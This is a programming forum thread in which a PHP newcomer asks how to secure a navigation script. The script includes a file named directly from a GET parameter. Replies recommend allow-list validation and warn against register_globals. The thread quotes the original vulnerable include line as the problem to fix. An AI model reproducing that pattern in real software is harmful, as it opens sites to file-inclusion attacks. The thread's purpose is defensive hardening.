Tek-Tips is the largest IT community on the Internet today!

Help please with includes

Status
Not open for further replies.

BizzyLizzy

Technical User
Nov 3, 2003
Hi there.

Hope someone can help a complete php newbie.

currently our website has the following code. Very simple and I believe pretty insecure. (our hosters have register globals on).

<?php
$view = $_GET['view'];
?>

then

<?php include ("$view.php"); ?>

then in the links section of the navigation bar.

index.php?view=home
index.php?view=aboutus

etc etc (there are about 10 pages in all).

The problem with this is that the resultant URL is shown as


Now correct me if I am wrong but isn't this terribly insecure? (I didn't write this by the way, I inherited it.)

I have been told that using $_POST would be a better way but I am not sure how I go about changing things. Ideally I would like to have the url just shown as
Am I making any sense here? Hopefully one of you clever people can give me some assistance.

Many thanks

Lizzy
 
As a rule of thumb, you should never blindly trust anything coming from the client. That includes $_GET, $_POST, $_REQUEST, and $_COOKIES.

If you're going to use an approach like this, you should validate the view parameter. One way to do it would be to use a list of valid pages. For example:
Code:
// Default to an empty string so a missing parameter does not raise a notice.
$view = isset($_GET['view']) ? $_GET['view'] : '';
// The only pages that may ever be included.
$good_pages = array('home', 'aboutus', 'whatever');
// Third argument = strict comparison, so the value must match exactly.
if (in_array($view, $good_pages, true)) {
    include("$view.php");
} else {
    die("Invalid page");
}
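An added example (not from this thread) that takes the allow-list idea one step further: the request only selects a key, and the file name and directory are fixed in the script. The page file names and the pages/ directory are assumptions.

```php
<?php
// Added example: hardened version of the view dispatcher discussed above.
// Assumes the page files live in a 'pages' directory next to index.php;
// the file names are assumptions, not the poster's real site.

// The request may only choose a key; the file name is never taken from it.
$pages = array(
    'home'    => 'home.php',
    'aboutus' => 'aboutus.php',
    'contact' => 'contact.php',
);

// Resolve a requested view to a file name, or null if it is not permitted.
function resolve_view(array $pages, $requested) {
    // Reject missing, non-string (e.g. view[]=x), empty or over-long values.
    if (!is_string($requested) || $requested === '' || strlen($requested) > 32) {
        return null;
    }
    // Exact key lookup: no type juggling, no partial matches.
    return array_key_exists($requested, $pages) ? $pages[$requested] : null;
}

// Every variable below is assigned before use, so a register_globals host
// cannot pre-seed $pages, $file or $base from the query string.
$requested = isset($_GET['view']) ? $_GET['view'] : 'home';
$file = resolve_view($pages, $requested);

if ($file === null) {
    http_response_code(404);
    die('Invalid page');
}

// The directory is fixed here, so the request can never change it.
$base = __DIR__ . '/pages/';
include $base . $file;
```

register_globals cannot be changed from inside the script; where the host allows per-directory overrides, `php_flag register_globals off` in an .htaccess file turns it off for that directory.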
 
Brilliant, OK, that sounds as though it's going to be a bit more secure.

Presumably I should validate all my variables throughout the site as well - due to the fact that the hosters have global variables switched on.

I have just been going through the rest of the site and notice that there are an awful lot of variables that are not set by default.

Anyway I will set the allowable pages in the index page and see how I go from there.

Lizzy
 
If your host has register globals turned on, either turn it off locally or move hosts. I would not trust an ISP to manage my data if it blindly ignored the advice of the writers of one of the core web applications. Worse still would be if the host had considered the risks, read the advice and then still turned register globals on. That would just be ignorant but reckless.
 